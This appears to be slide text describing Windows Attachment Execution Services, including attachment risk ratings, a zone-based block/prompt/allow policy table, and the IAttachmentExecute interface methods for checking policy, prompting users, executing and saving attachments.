Attachment Execution Services Gives each attachment a risk rating Based on extension, content-type, registered handlers, etc. Risk rating is mapped to a policy associated with IE Zones Developers should use the IAttachmentExecute COM interface as the entry point Replaces calls to AssocIsDangerous and custom UIs in the simplest case

Attachment Execution Services Default Zone Policy Restricted Internet Intranet Local Trusted High Risk Block Prompt Allow Med. Risk Low Risk

Attachment Execution Services IAttachmentExecute Interface CheckPolicy() Replaces client interpretation of AssocIsDangerous() and custom policy/configuration. Examines available evidence and checks the resulting policy PromptUser() Replaces custom prompts for user trust. Can be called by the application to force user interface (UI) at an earlier point, even before the file is copied to disk Execute Replaces call to ShellExecute(). Ensures CheckPolicy() and PromptUser() are called as needed. Calls the IAttachmentExecute::PromptUser() with an EXEC action Save() Ensures CheckPolicy () is called as needed. Saves evidence to the attachment